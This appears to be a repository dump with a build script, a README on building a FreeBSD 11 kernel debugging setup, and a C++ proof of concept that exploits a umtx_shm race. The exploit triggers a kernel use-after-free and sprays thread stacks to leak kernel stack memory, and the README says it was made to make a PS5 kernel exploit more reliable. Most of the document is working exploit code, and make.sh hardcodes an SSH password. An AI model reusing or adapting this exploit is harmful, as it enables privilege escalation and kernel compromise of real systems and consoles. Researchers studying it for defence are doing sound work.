├── make.sh ├── README.md └── umtxdbg.cpp /make.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | sshpass -p user scp umtxdbg.cpp user@172.23.28.141: 3 | sshpass -p user ssh user@172.23.28.141 "clang++ -O3 -static -std=c++11 -o umtxdbg umtxdbg.cpp && sync" 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NOTES 2 | 3 | The bug was found in early december 2020, not by me, but a genius who looked 15mins at fbsd and immediately spotted it 🙇‍♂️. This c++ impl was made when experimenting with increasing exploit reliability after ps5 kernel added some heap randomization features. 4 | 5 | # setup vm 6 | 7 | ## get vm image 8 | 9 | ``` 10 | wget http://ftp-archive.freebsd.org/pub/FreeBSD-Archive/old-releases/VM-IMAGES/11.0-RELEASE/amd64/Latest/FreeBSD-11.0-RELEASE-amd64.vhd.xz 11 | ``` 12 | 13 | ## enable ssh 14 | 15 | in the vm: `adduser`, add `sshd_enable="YES"` to `/etc/rc.conf`, `/etc/rc.d/sshd start` 16 | 17 | ## rebuild kernel with debug 18 | 19 | build ON THE VM because the freebsd build system is incompatible with non-freebsd systems (they enabled compat around fbsd 12/13 but we need 11...) 20 | 21 | see https://docs.freebsd.org/en/books/handbook/kernelconfig/ or just: 22 | 23 | ``` 24 | cd /usr/src/sys/amd64/conf 25 | cp GENERIC /root/CONFIG 26 | ln -s /root/CONFIG 27 | ``` 28 | 29 | edit CONFIG to __remove__ `options DDB` and __add__ `options GDB` 30 | 31 | build and install: 32 | ``` 33 | cd /src/src 34 | make buildkernel KERNCONF=CONFIG 35 | make installkernel KERNCONF=CONFIG 36 | reboot 37 | ``` 38 | 39 | copy `/usr/obj/usr/src/sys/CONFIG/kernel.debug` out of the vm for use with gdb. 40 | 41 | # setup gdb 42 | 43 | ## get kernel src for browsing / gdb 44 | 45 | ``` 46 | git clone -b releng/11.0 https://github.com/freebsd/freebsd.git 47 | ``` 48 | 49 | ## build gdb with fbsd support 50 | 51 | fetch latest from https://ftp.gnu.org/gnu/gdb/ and unpack 52 | 53 | ``` 54 | mkdir build 55 | cd build 56 | ../configure --disable-binutils --disable-ld --disable-gold --disable-gas --disable-sim --disable-gprof --target=x86_64-unknown-freebsd 57 | make -j64 58 | ``` 59 | 60 | ## make gdb suck less 61 | 62 | use https://github.com/cyrus-and/gdb-dashboard 63 | 64 | ### .gdbinit for freebsd kernel 65 | 66 | ``` 67 | set substitute-path /usr/src /home/shawn/freebsd 68 | set disassembly-flavor intel 69 | file kernel.debug 70 | target remote /tmp/fbsd11 71 | ``` 72 | 73 | ### wsl interop 74 | 75 | https://github.com/weltling/convey 76 | https://github.com/jstarks/npiperelay 77 | 78 | ### wrapper for starting "loose" gdb 79 | 80 | ``` 81 | #!/bin/sh 82 | GDB_PATH=/home/shawn/gdb-10.1/build/gdb 83 | PATH=$GDB_PATH:$PATH 84 | gdb --data-directory=/home/shawn/gdb-10.1/build/gdb/data-directory 85 | ``` 86 | 87 | ### gdb initial breakin 88 | 89 | in vm: 90 | ``` 91 | sysctl debug.kdb.enter=1 92 | ``` 93 | -------------------------------------------------------------------------------- /umtxdbg.cpp: -------------------------------------------------------------------------------- 1 | #define SMP 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | using u8 = uint8_t; 24 | using u32 = uint32_t; 25 | using vu32 = volatile u32; 26 | 27 | // This is just to ensure we act like the real exploit code in case fbsd libc wrappers 28 | // do something unexpected. 29 | #define SYSCALL(name) extern "C" decltype(name) __sys_##name; 30 | SYSCALL(open); 31 | SYSCALL(close); 32 | SYSCALL(_umtx_op); 33 | SYSCALL(shm_open); 34 | SYSCALL(shm_unlink); 35 | SYSCALL(mmap); 36 | SYSCALL(munmap); 37 | SYSCALL(mprotect); 38 | SYSCALL(ftruncate); 39 | SYSCALL(fstat); 40 | SYSCALL(sched_yield); 41 | SYSCALL(thr_new); 42 | SYSCALL(thr_exit); 43 | SYSCALL(cpuset_getaffinity); 44 | SYSCALL(cpuset_setaffinity); 45 | SYSCALL(ioctl); 46 | SYSCALL(rtprio_thread); 47 | #undef SYSCALL 48 | 49 | static int shm_open_anon() { 50 | return __sys_shm_open(SHM_ANON, O_RDWR | O_CREAT, 0666); 51 | } 52 | 53 | static int umtx_shm(void *addr, u_long flags) { 54 | return __sys__umtx_op(0, UMTX_OP_SHM, flags, addr, 0); 55 | } 56 | 57 | static int umtx_shm_create(void *addr) { 58 | return umtx_shm(addr, UMTX_SHM_CREAT); 59 | } 60 | 61 | static int umtx_shm_lookup(void *addr) { 62 | return umtx_shm(addr, UMTX_SHM_LOOKUP); 63 | } 64 | 65 | static int umtx_shm_destroy(void *addr) { 66 | return umtx_shm(addr, UMTX_SHM_DESTROY); 67 | } 68 | 69 | static int cpuset_getaffinity_tid(id_t tid, cpuset_t *mask) { 70 | return __sys_cpuset_getaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, tid, 71 | sizeof(*mask), mask); 72 | } 73 | 74 | static int cpuset_setaffinity_tid(id_t tid, const cpuset_t *mask) { 75 | return __sys_cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, tid, 76 | sizeof(*mask), mask); 77 | } 78 | 79 | static int cpuset_getaffinity_self(cpuset_t *mask) { 80 | return __sys_cpuset_getaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 81 | sizeof(*mask), mask); 82 | } 83 | 84 | static int cpuset_setaffinity_self(const cpuset_t *mask) { 85 | return __sys_cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 86 | sizeof(*mask), mask); 87 | } 88 | 89 | using rtprio_t = struct rtprio; 90 | 91 | static int rtprio_thread_get(lwpid_t lwpid, rtprio_t *rtp) { 92 | return rtprio_thread(RTP_LOOKUP, lwpid, rtp); 93 | } 94 | 95 | static int rtprio_thread_set(lwpid_t lwpid, const rtprio_t *rtp) { 96 | return rtprio_thread(RTP_SET, lwpid, (rtprio_t *)rtp); 97 | } 98 | 99 | // Mainly to ensure the thr_new can be as isolated as possible (e.g. 100 | // allocating the userspace stack doesn't happen to alloc any kernel objects) 101 | // NOTE only "bare" syscalls can be used from these threads. 102 | struct RopThread { 103 | static constexpr size_t STACK_SIZE{0x5000}; 104 | static constexpr size_t TLS_SIZE{0x1000}; 105 | RopThread() { 106 | stack = (u8*)aligned_alloc(0x1000, STACK_SIZE); 107 | tls = (u8*)aligned_alloc(0x1000, TLS_SIZE); 108 | bzero(stack, STACK_SIZE); 109 | bzero(tls, TLS_SIZE); 110 | } 111 | ~RopThread() { 112 | bzero(stack, STACK_SIZE); 113 | bzero(tls, TLS_SIZE); 114 | free(stack); 115 | free(tls); 116 | } 117 | int Start() { 118 | thr_param param = { 119 | .start_func = ThreadThunk, 120 | .arg = this, 121 | .stack_base = (char*)stack, 122 | .stack_size = STACK_SIZE - 0x1000, 123 | .tls_base = (char*)tls, 124 | .tls_size = TLS_SIZE, 125 | .child_tid = &tid, 126 | .parent_tid = &tid, 127 | }; 128 | return __sys_thr_new(¶m, sizeof(param)); 129 | } 130 | static void ThreadThunk(void *arg) { 131 | auto obj = (RopThread*)arg; 132 | obj->ThreadFunc(); 133 | obj->done = true; 134 | while (!obj->do_exit) {} 135 | __sys_thr_exit(nullptr); 136 | } 137 | virtual void ThreadFunc() = 0; 138 | long ThreadId() { 139 | // The creating thread should use parent_tid 140 | return tid; 141 | } 142 | void Join() { 143 | while (!done) {} 144 | do_exit = true; 145 | } 146 | int SetAffinity(size_t cpu_idx) { 147 | cpuset_t mask; 148 | CPU_SETOF(cpu_idx, &mask); 149 | auto rv = cpuset_setaffinity_tid(tid, &mask); 150 | if (rv < 0) { 151 | printf("%s:%d\n", __func__, rv); 152 | } 153 | return rv; 154 | } 155 | int GetAffinity(cpuset_t *mask) { 156 | return cpuset_getaffinity_tid(tid, mask); 157 | } 158 | u8 *stack{}; 159 | u8 *tls{}; 160 | long tid{}; 161 | std::atomic done{}; 162 | std::atomic do_exit{}; 163 | }; 164 | 165 | static void *shm_key; 166 | static std::atomic thread_signal; 167 | static std::atomic destroy_count; 168 | static std::atomic destroy_count2; 169 | static std::atomic lookup_count; 170 | static std::atomic lookup_done; 171 | static std::atomic thread_done_count; 172 | static std::atomic race_state; 173 | 174 | static void delay(u32 amount) { 175 | for (vu32 i = 0; i < amount; i++) {} 176 | } 177 | 178 | static void ioctl_spray(u8 val, size_t len) { 179 | u8 buf[len]; 180 | memset(buf, val, len); 181 | for (u32 i = 0; i < 100; i++) { 182 | __sys_ioctl(555555, 0x80000000 | (len << 16), buf); 183 | } 184 | } 185 | 186 | static constexpr bool reclaim_on_main() { 187 | return true; 188 | } 189 | 190 | struct DestroyThread : RopThread { 191 | void ThreadFunc() final { 192 | while (true) { 193 | while (!thread_signal) {} 194 | destroy_count++; 195 | while (!lookup_count) {} 196 | 197 | int rv = umtx_shm_destroy(shm_key); 198 | destroy_count2++; 199 | // TODO care about destroy retval? 200 | while (destroy_count2 < 2 && lookup_done < 1) {} 201 | //delay(1000000); 202 | 203 | if (!reclaim_on_main()) { 204 | fd = shm_open_anon(); 205 | } 206 | 207 | thread_done_count++; 208 | while (!race_state) {} 209 | if (race_state == 0xdead) { 210 | return; 211 | } 212 | race_state--; 213 | } 214 | } 215 | int fd{-1}; 216 | }; 217 | 218 | struct LookupThread : RopThread { 219 | void ThreadFunc() final { 220 | while (true) { 221 | while (!thread_signal) {} 222 | lookup_count++; 223 | while (destroy_count < 2) {} 224 | 225 | //delay(10); 226 | fd = umtx_shm_lookup(shm_key); 227 | lookup_done++; 228 | 229 | thread_done_count++; 230 | while (!race_state) {} 231 | if (race_state == 0xdead) { 232 | return; 233 | } 234 | race_state--; 235 | } 236 | } 237 | int fd{-1}; 238 | }; 239 | 240 | static std::atomic dummy_signal; 241 | static std::atomic dummy_count; 242 | 243 | struct DummyThread : RopThread { 244 | void ThreadFunc() final { 245 | // perform a syscall before notifying that this thread is ready 246 | __sys_sched_yield(); 247 | dummy_count++; 248 | while (!dummy_signal) {__sys_sched_yield();} 249 | } 250 | }; 251 | 252 | static void hexdump(const void* buf, size_t len) { 253 | auto data = (u8*)buf; 254 | for (size_t i = 0; i < len; i++) { 255 | bool align = ((i + 1) % 16) == 0; 256 | bool last = i == len - 1; 257 | bool newline = align || last; 258 | printf("%02x%c", data[i], newline ? '\n' : ' '); 259 | } 260 | } 261 | 262 | static int fstat_check(int fd, int original_fd, bool verbose = false) { 263 | struct stat sb{}; 264 | int rv = __sys_fstat(fd, &sb); 265 | auto size = sb.st_size; 266 | int size_fd = size / PAGE_SIZE; 267 | bool suspicious = rv == 0 && size_fd != fd && size_fd != original_fd; 268 | if (verbose) { 269 | printf("fstat %d:%d%s(%d)\n", fd, rv, suspicious ? "!!!" : "", size_fd); 270 | hexdump(&sb, sizeof(sb)); 271 | } 272 | return suspicious ? size_fd : -1; 273 | } 274 | 275 | static void set_shmfd_size(int fd) { 276 | auto size = fd * PAGE_SIZE; 277 | __sys_ftruncate(fd, size); 278 | 279 | // doesn't seem to make a difference 280 | if (0) { 281 | auto addr = __sys_mmap(nullptr, size, PROT_READ | PROT_WRITE, 282 | MAP_SHARED, fd, 0); 283 | memset(addr, 0x41, size); 284 | __sys_munmap(addr, size); 285 | } 286 | } 287 | 288 | struct RaceResult { 289 | u32 num_tries; 290 | int lookup; 291 | int winner; 292 | }; 293 | 294 | static RaceResult race() { 295 | shm_key = malloc(0x100); 296 | bzero(shm_key, 0x100); 297 | 298 | // Note that sony replaced the fbsd scheduler, and in the real exploit 299 | // default thread affinity differs from normal fbsd. 300 | // Normal freebsd defaults threads to all cores at RTP_PRIO_NORMAL priority 0. 301 | // ps5 defaults threads to core 1 at RTP_PRIO_FIFO priority 700. 302 | cpuset_t cpumask; 303 | CPU_SETOF(0, &cpumask); 304 | cpuset_setaffinity_self(&cpumask); 305 | 306 | std::array dthreads; 307 | for (size_t i = 0; i < dthreads.size(); i++) { 308 | auto& thread = dthreads[i]; 309 | thread.Start(); 310 | thread.SetAffinity(1 + i); 311 | } 312 | 313 | LookupThread lthread; 314 | lthread.Start(); 315 | lthread.SetAffinity(1 + dthreads.size()); 316 | 317 | for (u32 num_tries = 0; ; num_tries++) { 318 | thread_signal = false; 319 | destroy_count = 0; 320 | destroy_count2 = 0; 321 | lookup_count = 0; 322 | lookup_done = 0; 323 | thread_done_count = 0; 324 | race_state = 0; 325 | 326 | for (auto &thread : dthreads) { 327 | thread.fd = -200; 328 | } 329 | lthread.fd = -200; 330 | 331 | int original_fd = -1; 332 | { 333 | // Create a umtx_shm_reg { ushm_refcnt = 1, ushm_obj = { shm_refs = 2 } } 334 | int fd = original_fd = umtx_shm_create(shm_key); 335 | //printf("original fd:%d\n", fd); 336 | set_shmfd_size(fd); 337 | // decref ushm_obj->shm_refs 338 | __sys_close(fd); 339 | } 340 | 341 | thread_signal = true; 342 | while (thread_done_count < 3) {} 343 | thread_signal = false; 344 | 345 | if (reclaim_on_main()) { 346 | // also works. might make logic easier on real exploit. 347 | for (u32 i = 0; i < dthreads.size(); i++) { 348 | // move mainthread to same core as dthread 349 | CPU_SETOF(1 + i, &cpumask); 350 | cpuset_setaffinity_self(&cpumask); 351 | // do the reclaim here instead of on dthread. 352 | dthreads[i].fd = umtx_shm_create((u8*)shm_key + 8);//shm_open_anon(); 353 | umtx_shm_destroy((u8*)shm_key + 8); 354 | } 355 | CPU_SETOF(0, &cpumask); 356 | cpuset_setaffinity_self(&cpumask); 357 | } 358 | 359 | for (auto &thread : dthreads) { 360 | //printf("destroy:%d\n", thread.fd); 361 | int fd = thread.fd; 362 | if (fd < 0) { 363 | continue; 364 | } 365 | set_shmfd_size(fd); 366 | //fstat_check(fd, original_fd); 367 | } 368 | 369 | int winner = -1; 370 | if (lthread.fd >= 0) { 371 | //printf("lookup:%d\n", lthread.fd); 372 | winner = fstat_check(lthread.fd, original_fd); 373 | } 374 | for (auto &thread : dthreads) { 375 | int fd = thread.fd; 376 | if (fd < 0 || fd == winner) { 377 | continue; 378 | } 379 | //printf("destroy:close:%d\n", fd); 380 | // no impact to exploit but cleans up fd 381 | __sys_close(fd); 382 | } 383 | 384 | if (winner >= 0) { 385 | race_state = 0xdead; 386 | // cleanup threads 387 | for (auto &thread : dthreads) { 388 | thread.Join(); 389 | } 390 | lthread.Join(); 391 | 392 | return { num_tries, lthread.fd, winner }; 393 | } 394 | 395 | race_state = 3; 396 | while (race_state) {} 397 | 398 | // lost: cleanup fd and retry 399 | // NOTE: if the race succeeded but we failed to reclaim the allocation 400 | // (via shm_open_anon on a DestroyThread), then closing this fd will 401 | // cause a doublefree or free of some random kernel allocation - both 402 | // will cause a panic eventually. 403 | // If that becomes a problem, could try multiple shm_open_anon. 404 | __sys_close(lthread.fd); 405 | } 406 | } 407 | 408 | static bool all_zero(u8 *buf, size_t len) { 409 | for (size_t i = 0; i < len; i++) { 410 | if (buf[i]) { 411 | return false; 412 | } 413 | } 414 | return true; 415 | } 416 | 417 | int main() { 418 | auto result = race(); 419 | 420 | printf("race won after %d tries lookup:%d winner:%d\n", result.num_tries, 421 | result.lookup, result.winner); 422 | std::array spray_threads; 423 | 424 | // need at least 1 but amount doesn't seem to matter much? 425 | u32 fill_count = 1; 426 | auto spray = (u32*)malloc(fill_count * 4); 427 | for (u32 i = 0; i < fill_count; i++) { 428 | umtx_shm_create(&spray[i]); 429 | } 430 | 431 | //fstat_check(result.lookup, 0, true); 432 | //fstat_check(result.winner, 0, true); 433 | 434 | // We have 2 fd referencing a shmfd which will be free'd if we close 1 fd...do that 435 | __sys_close(result.winner); 436 | 437 | // mmap using the remaining fd to reference the free'd but still initialized vmobject. 438 | // It is possible to set nonzero offset if total size is within bounds (set 439 | // by truncating the shmfd). However making the shmfd large and then reading 440 | // off the end of the kstack will segfault. 441 | auto kstack_len = PAGE_SIZE * 4; 442 | auto kstack = (u8*)__sys_mmap(nullptr, kstack_len, PROT_READ | PROT_WRITE, 443 | MAP_SHARED, result.lookup, 0); 444 | 445 | // Spray kernel thread stacks. We want a kstack vmobject to reclaim the 446 | // free'd one which was just mapped. 447 | for (auto &t : spray_threads) { 448 | t.Start(); 449 | } 450 | while (dummy_count != spray_threads.size()) {} 451 | 452 | printf("kstack %p\n", kstack); 453 | if (all_zero(kstack, kstack_len)) { 454 | puts("all zero :("); 455 | // it is safe to exit in this case. we could retry 456 | // it is unclear why this happens 457 | return 1; 458 | } 459 | hexdump(&kstack[kstack_len - PAGE_SIZE], PAGE_SIZE); 460 | 461 | // ctrl+z to send to background for now... 462 | while (true) { 463 | __sys_sched_yield(); 464 | } 465 | 466 | free(shm_key); 467 | return 0; 468 | } 469 | --------------------------------------------------------------------------------